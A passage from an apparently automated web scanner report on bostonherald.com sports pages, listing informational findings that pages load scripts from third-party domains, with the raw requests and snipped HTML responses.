Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.720. http://www.bostonherald.com/sports/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 113792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!--//cinesports//-->
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.721. http://www.bostonherald.com/sports/baseball/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/baseball/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/baseball/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.722. http://www.bostonherald.com/sports/basketball/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/basketball/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:57:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaschedule.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaministandings.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbateamleaders.aspx?id=092"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.723. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.724. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.725. http://www.bostonherald.com/sports/college/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/college/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/college/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:05:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!--//include 8 //-->
           <script src="http://sports.ap.org/college-football/moduleif.ashx?mid=APPollModule&key=new&ap_poll_type=mypoll&width=315&mod_tpl=modulewidgets&mod_ii=true&mod_tracker=true&ap_code=cj120705K&height=475"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.726. http://www.bostonherald.com/sports/columnists/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/columnists/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:58:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 61999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.727. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:57:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
